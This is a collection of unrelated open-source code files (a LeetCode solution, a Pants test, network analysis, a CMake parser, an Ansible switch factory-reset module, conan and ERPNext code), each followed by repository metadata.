:type nums: List[int]
:rtype: bool
"""
        n = len(nums)
        t = 0  # number of violations repaired so far
        for i in range(n - 1):  # range: the original's xrange is Python 2 only
            if nums[i] > nums[i+1]:
                # A violation can be repaired by lowering nums[i] or raising
                # nums[i+1]; the neighbours decide which repair keeps order.
                if i - 1 < 0 or i + 2 > n - 1:
                    t += 1  # violation touches an array edge: always fixable
                elif nums[i-1] <= nums[i+1]:
                    t += 1  # lower nums[i] down to nums[i+1]
                elif nums[i+2] >= nums[i]:
                    t += 1  # raise nums[i+1] up to nums[i]
                else:
                    return False  # neither repair works
        return t <= 1
|
daohu527/leetcode_learning
|
665. Non-decreasing Array/code.py
|
Python
|
gpl-3.0
| 554 | 0.001805 |
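A quick check of the two repair cases the solution above distinguishes, assuming the Solution class is in scope.

s = Solution()
print(s.checkPossibility([4, 2, 3]))     # True: lower the 4 to 2
print(s.checkPossibility([3, 4, 1, 2]))  # False: 4 > 1 and neither repair keeps order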
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from abc import ABCMeta, abstractmethod
from pathlib import PurePath
from textwrap import dedent
from typing import List, Tuple, Type
from unittest.mock import Mock
import pytest
from pants.base.exceptions import ResolveError
from pants.build_graph.address import Address
from pants.engine.fs import (
EMPTY_DIRECTORY_DIGEST,
Digest,
FileContent,
InputFilesContent,
Workspace,
)
from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner
from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin
from pants.engine.legacy.structs import TargetAdaptorWithOrigin
from pants.engine.rules import UnionMembership
from pants.rules.core.fmt_test import FmtTest
from pants.rules.core.test import (
AddressAndTestResult,
CoverageDataBatch,
CoverageReport,
FilesystemCoverageReport,
Status,
Test,
TestDebugRequest,
TestResult,
TestRunner,
WrappedTestRunner,
run_tests,
)
from pants.testutil.engine.util import MockConsole, MockGet, run_rule
from pants.testutil.test_base import TestBase
from pants.util.ordered_set import OrderedSet
# TODO(#9141): replace this with a proper util to create `GoalSubsystem`s
class MockOptions:
def __init__(self, **values):
self.values = Mock(**values)
class MockTestRunner(TestRunner, metaclass=ABCMeta):
@staticmethod
def is_valid_target(_: TargetAdaptorWithOrigin) -> bool:
return True
@staticmethod
@abstractmethod
def status(_: Address) -> Status:
pass
@staticmethod
def stdout(_: Address) -> str:
return ""
@staticmethod
def stderr(_: Address) -> str:
return ""
@property
def test_result(self) -> TestResult:
address = self.adaptor_with_origin.adaptor.address
return TestResult(self.status(address), self.stdout(address), self.stderr(address))
class SuccessfulTestRunner(MockTestRunner):
@staticmethod
def status(_: Address) -> Status:
return Status.SUCCESS
@staticmethod
def stdout(address: Address) -> str:
return f"Successful test runner: Passed for {address}!"
class ConditionallySucceedsTestRunner(MockTestRunner):
@staticmethod
def status(address: Address) -> Status:
return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS
@staticmethod
def stdout(address: Address) -> str:
return (
f"Conditionally succeeds test runner: Passed for {address}!"
if address.target_name != "bad"
else ""
)
@staticmethod
def stderr(address: Address) -> str:
return (
f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!"
if address.target_name == "bad"
else ""
)
class InvalidTargetTestRunner(MockTestRunner):
@staticmethod
def is_valid_target(_: TargetAdaptorWithOrigin) -> bool:
return False
@staticmethod
def status(_: Address) -> Status:
return Status.FAILURE
class TestTest(TestBase):
def make_ipr(self) -> InteractiveProcessRequest:
input_files_content = InputFilesContent(
(FileContent(path="program.py", content=b"def test(): pass"),)
)
digest = self.request_single_product(Digest, input_files_content)
return InteractiveProcessRequest(
argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest,
)
def run_test_rule(
self,
*,
test_runner: Type[TestRunner],
targets: List[HydratedTargetWithOrigin],
debug: bool = False,
) -> Tuple[int, str]:
console = MockConsole(use_colors=False)
options = MockOptions(debug=debug, run_coverage=False)
interactive_runner = InteractiveRunner(self.scheduler)
workspace = Workspace(self.scheduler)
union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])})
def mock_coordinator_of_tests(
wrapped_test_runner: WrappedTestRunner,
) -> AddressAndTestResult:
runner = wrapped_test_runner.runner
return AddressAndTestResult(
address=runner.adaptor_with_origin.adaptor.address,
test_result=runner.test_result, # type: ignore[attr-defined]
)
result: Test = run_rule(
run_tests,
rule_args=[
console,
options,
interactive_runner,
HydratedTargetsWithOrigins(targets),
workspace,
union_membership,
],
mock_gets=[
MockGet(
product_type=AddressAndTestResult,
subject_type=WrappedTestRunner,
mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner),
),
MockGet(
product_type=TestDebugRequest,
subject_type=TestRunner,
mock=lambda _: TestDebugRequest(self.make_ipr()),
),
MockGet(
product_type=CoverageReport,
subject_type=CoverageDataBatch,
mock=lambda _: FilesystemCoverageReport(
result_digest=EMPTY_DIRECTORY_DIGEST,
directory_to_materialize_to=PurePath("mockety/mock"),
),
),
],
union_membership=union_membership,
)
return result.exit_code, console.stdout.getvalue()
def test_empty_target_noops(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)],
)
assert exit_code == 0
assert stdout.strip() == ""
def test_invalid_target_noops(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=InvalidTargetTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin()],
)
assert exit_code == 0
assert stdout.strip() == ""
def test_single_target(self) -> None:
target_with_origin = FmtTest.make_hydrated_target_with_origin()
address = target_with_origin.target.adaptor.address
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner, targets=[target_with_origin],
)
assert exit_code == 0
assert stdout == dedent(
f"""\
{address} stdout:
{SuccessfulTestRunner.stdout(address)}
{address} ..... SUCCESS
"""
)
def test_multiple_targets(self) -> None:
good_target = FmtTest.make_hydrated_target_with_origin(name="good")
good_address = good_target.target.adaptor.address
bad_target = FmtTest.make_hydrated_target_with_origin(name="bad")
bad_address = bad_target.target.adaptor.address
exit_code, stdout = self.run_test_rule(
test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target],
)
assert exit_code == 1
assert stdout == dedent(
f"""\
{good_address} stdout:
{ConditionallySucceedsTestRunner.stdout(good_address)}
{bad_address} stderr:
{ConditionallySucceedsTestRunner.stderr(bad_address)}
{good_address} ..... SUCCESS
{bad_address} ..... FAILURE
"""
)
def test_single_debug_target(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin()],
debug=True,
)
assert exit_code == 0
def test_multiple_debug_targets_fail(self) -> None:
with pytest.raises(ResolveError):
self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[
FmtTest.make_hydrated_target_with_origin(name="t1"),
FmtTest.make_hydrated_target_with_origin(name="t2"),
],
debug=True,
)
|
wisechengyi/pants
|
src/python/pants/rules/core/test_test.py
|
Python
|
apache-2.0
| 8,678 | 0.001498 |
#!/usr/bin/env python2.7
import logging
import numpy as np
from .analysis import Analysis
class HopCountAnalysis(Analysis):
def __init__(self, scenario, location, repetitions, csv):
Analysis.__init__(self, scenario, location, "hopCount", repetitions, csv)
self.logger = logging.getLogger('baltimore.analysis.HopCountAnalysis')
self.logger.debug('creating an instance of HopCountAnalysis for scenario %s', scenario)
self.data_min = {}
self.data_max = {}
self.data_median = {}
self.data_std = {}
self.data_avg = {}
def evaluate(self, experiment_results, is_verbose=False):
self.logger.info("running hop count analysis")
hop_count = {}
raw_data = []
for repetition in experiment_results:
nodes = experiment_results.nodes_have_metric("hopCount", repetition)
for node in nodes:
data = experiment_results.get_tuple_metric_per_node("hopCount", node, repetition)
for element in data:
raw_data.append([repetition, node, float(element[0]), int(element[1])])
if node not in hop_count:
hop_count[node] = []
hop_count[node].append(raw_data)
raw_data = []
for node, data in list(hop_count.items()):
hop_count_data = [element[3] for repetition in data for element in repetition]
self.data_min[node] = np.amin(hop_count_data)
self.data_max[node] = np.amax(hop_count_data)
self.data_median[node] = np.median(hop_count_data)
self.data_std[node] = np.std(hop_count_data)
self.data_avg[node] = np.average(hop_count_data)
self.logger.info("Printing hop count statistics for node %s", node)
self.logger.info("Minimum hop count = %f nodes", self.data_min[node])
self.logger.info("Maximum hop count = %f nodes", self.data_max[node])
self.logger.info("Std.Deviation = %f nodes", self.data_std[node])
self.logger.info("Average hop count = %f nodes", self.data_avg[node])
self.logger.info("Median hop count = %f nodes", self.data_median[node])
if self.draw:
for node in hop_count:
self.metric = "hop_count_node-" + str(node)
self.plot_boxplot("Average Hop Count (Node " + str(node) + ")", "Repetition", "Hop Count [ms]", self.data_avg[node])
if self.csv:
self.export_csv()
self.export_csv_raw(hop_count)
def export_csv(self):
self.metric = "hopCount"
file_name = self.scenario + "_" + self.metric + "_aggregated.csv"
disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['# aggregated over ' + str(self.repetitions) + ' repetitions'],['#']]
header = ['node', 'min', 'max', 'median', 'std', 'avg']
data = []
for node in self.data_min:
data.append([node, self.data_min[node], self.data_max[node], self.data_median[node], self.data_std[node], self.data_avg[node]])
self._write_csv_file(file_name, disclaimer, header, data)
def export_csv_raw(self, raw_data):
self.metric = "hopCount"
file_name = self.scenario + "_" + self.metric + ".csv"
disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['#']]
header = ['node', 'repetition', 'timestamp', 'hop count']
data = []
for node, hop_counts in list(raw_data.items()):
for values in hop_counts:
for element in values:
data.append([node, element[0], element[2], element[3]])
self._write_csv_file(file_name, disclaimer, header, data)
|
mfrey/baltimore
|
analysis/hopcountanalysis.py
|
Python
|
gpl-3.0
| 3,831 | 0.006004 |
#!env python
# Copyright 2008 Simon Edwards <simon@simonzone.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import re
import os.path
import glob
import kbindinggenerator.cmakeparser as cmakeparser
def ExtractInstallFiles(filename=None,input=None,variables=None):
if variables is None:
variables = {}
else:
variables = variables.copy()
install_list = []
if filename is not None:
variables['cmake_current_source_dir'] = [os.path.dirname(filename)]
ExtractInstallFilesWithContext(variables, install_list, filename,input)
# print(repr(variables))
# print(repr(install_list))
return install_list
def ExtractInstallFilesWithContext(variables, install_list, filename=None, input=None, fileprefix=""):
inputstring = ""
currentdir = ""
if input:
inputstring = input
elif filename:
currentdir = os.path.dirname(filename)
fhandle = open(filename)
inputstring= fhandle.read()
fhandle.close()
parser = cmakeparser.CMakeParser()
command_list = parser.parse(inputstring, filename)
include_dirs = []
for commandobject in command_list:
command = commandobject.command().lower()
args = [arg.value() for arg in commandobject.arguments()]
if command=="set":
variables[args[0].lower()] = ExpandArgs(variables, args[1:], filename)
elif command=="install":
install_args = ExpandArgs(variables, args, filename)
for arg in install_args:
if arg.endswith('.h'):
for basepath in [currentdir, fileprefix] + include_dirs:
fullpath = os.path.join(basepath, arg)
# print(fullpath)
if os.path.exists(fullpath):
install_list.append(fullpath)
break
else:
fullpath = os.path.join(currentdir, basepath, arg)
if os.path.exists(fullpath):
install_list.append(fullpath)
break
else:
print("Unable to find header file " + arg)
elif command=="include":
if filename is not None:
command_args = ExpandArgs(variables, args, filename)
this_dir = os.path.dirname(filename)
for arg in command_args:
if len(arg.strip())!=0:
include_filename = os.path.join(this_dir,arg)
if os.path.exists(include_filename):
ExtractInstallFilesWithContext(variables, install_list, include_filename)
elif command=="add_subdirectory":
if filename is not None:
command_args = ExpandArgs(variables, args, filename)
this_dir = os.path.dirname(filename)
for arg in command_args:
if len(arg.strip())!=0:
include_filename = os.path.join(this_dir,arg,"CMakeLists.txt")
if os.path.exists(include_filename):
ExtractInstallFilesWithContext(variables, install_list, include_filename, fileprefix=os.path.join(fileprefix,arg))
elif command=="file":
# This is just a basic cmake FILE() implementation. It just does GLOB.
command_args = ExpandArgs(variables, args, filename)
varname = None
result = None
try:
it = iter(command_args)
                arg = next(it)  # next(it): the original mixed it.__next__() and it.next()
                if arg.lower()=='glob' and filename is not None:
                    arg = next(it)
                    varname = arg
                    arg = next(it)
                    relative_dir = os.path.dirname(filename)
                    if arg.lower()=='relative':
                        arg = next(it)
                        relative_dir = arg
                        arg = next(it)
                    if not relative_dir.endswith('/'):
                        relative_dir += '/'
                    result = []
                    current_dir = variables['cmake_current_source_dir'][0]
                    while True:
                        for x in glob.iglob(os.path.join(current_dir, arg)):
                            if x.startswith(relative_dir):
                                x = x[len(relative_dir):]
                            result.append(x)
                        arg = next(it)
except StopIteration:
if varname is not None and result is not None:
variables[varname.lower()] = result
elif command=="ecm_generate_headers":
header_args = ExpandArgs(variables, args, filename)
# print("ecm_generate_headers:"+repr(header_args))
prefix=""
if "RELATIVE" in header_args:
prefix = header_args[header_args.index("RELATIVE")+1]
for item in header_args:
if item == "REQUIRED_HEADERS" or item == "RELATIVE":
break
headername = os.path.join(currentdir, prefix, item.lower() + ".h")
if os.path.exists(headername):
install_list.append(headername)
elif command == "target_include_directories":
include_args = ExpandArgs(variables, args, filename)
if "PUBLIC" in include_args:
for item in include_args[include_args.index("PUBLIC")+1:]:
include_dirs.append(item)
#print("include dirs:",repr(include_dirs))
def ExpandArgs(variables, args, filename=None):
rex = re.compile(r'(\$\{[^\}]+\})')
fixed_args = []
for arg in args:
fixed_parts = []
if arg.startswith("$<BUILD_INTERFACE:"):
arg = arg[len("$<BUILD_INTERFACE:"): -1]
parts = rex.split(arg)
for part in parts:
if part.startswith("${"):
name = part[2:-1].lower()
if name in variables:
value = variables[name]
if len(value)==1:
fixed_parts.append(variables[name][0])
else:
fixed_args.extend(value)
else:
print("Undefined cmake variable '" + name + "' in " + filename)
else:
fixed_parts.append(part)
fixed_args.append(''.join(fixed_parts))
return fixed_args
def __FetchCommands(lexer):
topmode = True
command_list = []
command = None
args = []
tok = lexer.token()
while 1:
if not tok:
if command:
command_list.append( (command,args) )
break # No more input
if topmode:
if tok.type=="COMMAND":
command = tok.value
topmode = False
else:
print("Fail")
# Fail
tok = lexer.token()
else:
# Grab arguments
if tok.type=="COMMAND":
if command:
command_list.append( (command,args) )
command = None
args = []
topmode = True
continue
args.append(tok.value)
tok = lexer.token()
return command_list
if __name__=="__main__":
#print("Testing")
#lexer = cmakelexer.CMakeLexer()
print(ExtractInstallFiles(filename="/home/sbe/devel/svn/kde/trunk/KDE/kdeedu/marble/src/lib/CMakeLists.txt"))
def foo():
ExtractInstallFiles(input="""
find_package(KDE4 REQUIRED)
include (KDE4Defaults)
include_directories(${CMAKE_CURRENT_SOURCE_DIR} ${KDEBASE_WORKSPACE_SOURCE_DIR}/libs ${CMAKE_CURRENT_SOURCE_DIR}/.. ${KDE4_INCLUDES} ${OPENGL_INCLUDE_DIR})
add_subdirectory(tests)
add_definitions(-DKDE_DEFAULT_DEBUG_AREA=1209)
########### next target ###############
set(plasmagik_SRCS
packagemetadata.cpp
packagestructure.cpp
package.cpp
)
set(plasma_LIB_SRCS
${plasmagik_SRCS}
abstractrunner.cpp
animationdriver.cpp
animator.cpp
applet.cpp
appletbrowser.cpp
appletbrowser/customdragtreeview.cpp
appletbrowser/kcategorizeditemsview.cpp
appletbrowser/kcategorizeditemsviewdelegate.cpp
appletbrowser/kcategorizeditemsviewmodels.cpp
appletbrowser/openwidgetassistant.cpp
appletbrowser/plasmaappletitemmodel.cpp
configxml.cpp
containment.cpp
corona.cpp
datacontainer.cpp
dataengine.cpp
dataenginemanager.cpp
delegate.cpp
dialog.cpp
extender.cpp
extenderitem.cpp
paintutils.cpp
panelsvg.cpp
plasma.cpp
popupapplet.cpp
private/applethandle.cpp
private/datacontainer_p.cpp
private/desktoptoolbox.cpp
private/nativetabbar.cpp
private/packages.cpp
private/paneltoolbox.cpp
private/toolbox.cpp
private/tooltip.cpp
querymatch.cpp
runnercontext.cpp
runnermanager.cpp
scripting/appletscript.cpp
scripting/dataenginescript.cpp
scripting/runnerscript.cpp
scripting/scriptengine.cpp
service.cpp
servicejob.cpp
svg.cpp
theme.cpp
tooltipmanager.cpp
uiloader.cpp
version.cpp
view.cpp
wallpaper.cpp
widgets/checkbox.cpp
widgets/combobox.cpp
widgets/flash.cpp
widgets/frame.cpp
widgets/groupbox.cpp
widgets/icon.cpp
widgets/label.cpp
widgets/lineedit.cpp
widgets/meter.cpp
widgets/pushbutton.cpp
widgets/radiobutton.cpp
widgets/signalplotter.cpp
widgets/slider.cpp
widgets/tabbar.cpp
widgets/textedit.cpp
widgets/webcontent.cpp
)
kde4_add_ui_files (
plasma_LIB_SRCS
appletbrowser/kcategorizeditemsviewbase.ui
)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
MESSAGE(STATUS "Adding support for OpenGL applets to libplasma")
set(plasma_LIB_SRCS
${plasma_LIB_SRCS}
glapplet.cpp)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
kde4_add_library(plasma SHARED ${plasma_LIB_SRCS})
target_link_libraries(plasma ${KDE4_KIO_LIBS} ${KDE4_KFILE_LIBS} ${KDE4_KNEWSTUFF2_LIBS}
${QT_QTUITOOLS_LIBRARY} ${QT_QTWEBKIT_LIBRARY}
${KDE4_THREADWEAVER_LIBRARIES} ${KDE4_SOLID_LIBS} ${X11_LIBRARIES})
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
target_link_libraries(plasma ${QT_QTOPENGL_LIBRARY} ${OPENGL_gl_LIBRARY})
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
set_target_properties(plasma PROPERTIES
VERSION 3.0.0
SOVERSION 3
${KDE4_DISABLE_PROPERTY_}LINK_INTERFACE_LIBRARIES "${KDE4_KDEUI_LIBS}"
)
install(TARGETS plasma ${INSTALL_TARGETS_DEFAULT_ARGS})
########### install files ###############
set(plasmagik_HEADERS
packagemetadata.h
packagestructure.h
package.h
)
install(FILES ${plasmagik_HEADERS} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/ COMPONENT Devel)
set(plasma_LIB_INCLUDES
abstractrunner.h
animationdriver.h
animator.h
applet.h
appletbrowser.h
configxml.h
containment.h
corona.h
datacontainer.h
dataengine.h
dataenginemanager.h
delegate.h
dialog.h
extender.h
extenderitem.h
paintutils.h
panelsvg.h
plasma.h
plasma_export.h
popupapplet.h
querymatch.h
runnercontext.h
runnermanager.h
service.h
servicejob.h
svg.h
theme.h
tooltipmanager.h
uiloader.h
tooltipmanager.h
version.h
view.h
wallpaper.h)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
set(plasma_LIB_INCLUDES
${plasma_LIB_INCLUDES}
glapplet.h)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
${plasma_LIB_INCLUDES}
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma COMPONENT Devel)
install(FILES
widgets/checkbox.h
widgets/combobox.h
widgets/flash.h
widgets/frame.h
widgets/groupbox.h
widgets/icon.h
widgets/label.h
widgets/lineedit.h
widgets/meter.h
widgets/pushbutton.h
widgets/radiobutton.h
widgets/signalplotter.h
widgets/slider.h
widgets/tabbar.h
widgets/textedit.h
widgets/webcontent.h
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/widgets COMPONENT Devel)
install(FILES
scripting/appletscript.h
scripting/dataenginescript.h
scripting/runnerscript.h
scripting/scriptengine.h
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/scripting COMPONENT Devel)
install(FILES
includes/AbstractRunner
includes/AnimationDriver
includes/Animator
includes/Applet
includes/AppletBrowser
includes/AppletScript
includes/CheckBox
includes/ComboBox
includes/ConfigXml
includes/Containment
includes/Corona
includes/DataContainer
includes/DataEngine
includes/DataEngineManager
includes/DataEngineScript
includes/Delegate
includes/Dialog
includes/Extender
includes/ExtenderItem
includes/Flash
includes/GroupBox
includes/Icon
includes/Label
includes/LineEdit
includes/Meter
includes/Package
includes/PackageMetadata
includes/PackageStructure
includes/PaintUtils
includes/PanelSvg
includes/Plasma
includes/PopupApplet
includes/PushButton
includes/QueryMatch
includes/RadioButton
includes/RunnerContext
includes/RunnerManager
includes/RunnerScript
includes/ScriptEngine
includes/Service
includes/ServiceJob
includes/SignalPlotter
includes/Slider
includes/Svg
includes/TabBar
includes/TextEdit
includes/ToolTipManager
includes/Theme
includes/UiLoader
includes/View
includes/Version
includes/Wallpaper
includes/WebContent
DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
includes/GLApplet
DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
servicetypes/plasma-animator.desktop
servicetypes/plasma-applet.desktop
servicetypes/plasma-containment.desktop
servicetypes/plasma-dataengine.desktop
servicetypes/plasma-packagestructure.desktop
servicetypes/plasma-runner.desktop
servicetypes/plasma-scriptengine.desktop
servicetypes/plasma-wallpaper.desktop
DESTINATION ${SERVICETYPES_INSTALL_DIR})
install(FILES scripting/plasmoids.knsrc DESTINATION ${CONFIG_INSTALL_DIR})
""")
# Tokenize
#while 1:
# tok = lexer.token()
# if not tok: break # No more input
# print tok
#while 1:
# tok = cmakelexer.lex.token()
# if not tok: break # No more input
# print tok
|
KDE/twine2
|
kbindinggenerator/cmake.py
|
Python
|
lgpl-3.0
| 15,357 | 0.004428 |
import os
import re
import cmd
import sys
import time
import util
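# Shut down the libvirt guest named as the first command-line argument via
# "virsh shutdown", then block until util.vm_is_running() reports it stopped.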
host = sys.argv[1]
cmd.run("virsh shutdown %s" % (host))
while util.vm_is_running(host):
time.sleep(1)
|
alobbs/qvm
|
qvm/qvm-stop.py
|
Python
|
apache-2.0
| 171 | 0.017544 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Reset to factory settings of Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_factory
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS
description:
- This module allows you to reset a switch's startup configuration. The method provides a way to reset the
startup configuration to its factory settings. This is helpful when you want to move the switch to another
topology as a new network device.
This module uses SSH to manage network device configuration.
The results of the operation can be viewed in the results directory.
For more information about this module from Lenovo and customizing its usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks: The following are examples of using the module cnos_factory. These are written in the main.yml file of the tasks directory.
---
- name: Test Reset to factory
cnos_factory:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}"
password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Startup Config is Reset to factory settings"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import re
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except ImportError:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save erase \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure this is acceptable for the security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLI command; 'save erase' prompts for confirmation, which is answered with 'y' below
output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn)
output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
hryamzik/ansible
|
lib/ansible/modules/network/cnos/cnos_factory.py
|
Python
|
gpl-3.0
| 5,299 | 0.00434 |
import os
import unittest
from conans.client.cache.cache import CONAN_CONF
from conans.client.conf import ConanClientConfigParser
from conans.paths import DEFAULT_PROFILE_NAME
from conans.test.utils.test_files import temp_folder
from conans.util.files import save
default_client_conf = '''[storage]
path: ~/.conan/data
[log]
trace_file = "Path/with/quotes"
[general]
'''
default_profile = '''
[settings]
arch=x86_64
build_type=Release
compiler=gcc
compiler.libcxx=libstdc++
compiler.version=4.9
os=Linux
'''
class ClientConfTest(unittest.TestCase):
def test_quotes(self):
tmp_dir = temp_folder()
save(os.path.join(tmp_dir, CONAN_CONF), default_client_conf)
save(os.path.join(tmp_dir, DEFAULT_PROFILE_NAME), default_profile)
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(config.env_vars["CONAN_TRACE_FILE"], "Path/with/quotes")
def test_proxies(self):
tmp_dir = temp_folder()
save(os.path.join(tmp_dir, CONAN_CONF), "")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(None, config.proxies)
save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertNotIn("no_proxy", config.proxies)
save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]\nno_proxy=localhost")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(config.proxies["no_proxy"], "localhost")
|
memsharded/conan
|
conans/test/unittests/util/client_conf_test.py
|
Python
|
mit
| 1,569 | 0.001275 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, filter_strip_join
from frappe.website.website_generator import WebsiteGenerator
from frappe.contacts.address_and_contact import load_address_and_contact
class SalesPartner(WebsiteGenerator):
website = frappe._dict(
page_title_field = "partner_name",
condition_field = "show_in_website",
template = "templates/generators/sales_partner.html"
)
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self, "sales_partner")
def autoname(self):
self.name = self.partner_name
def validate(self):
if not self.route:
self.route = "partners/" + self.scrub(self.partner_name)
super(SalesPartner, self).validate()
if self.partner_website and not self.partner_website.startswith("http"):
self.partner_website = "http://" + self.partner_website
def get_context(self, context):
address = frappe.db.get_value("Address",
{"sales_partner": self.name, "is_primary_address": 1},
"*", as_dict=True)
if address:
city_state = ", ".join(filter(None, [address.city, address.state]))
address_rows = [address.address_line1, address.address_line2,
city_state, address.pincode, address.country]
context.update({
"email": address.email_id,
"partner_address": filter_strip_join(address_rows, "\n<br>"),
"phone": filter_strip_join(cstr(address.phone).split(","), "\n<br>")
})
return context
|
vishdha/erpnext
|
erpnext/setup/doctype/sales_partner/sales_partner.py
|
Python
|
gpl-3.0
| 1,584 | 0.024621 |
#!/usr/bin/python
# This file is part of P4wnP1.
#
# Copyright (c) 2017, Marcus Mengs.
#
# P4wnP1 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# P4wnP1 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
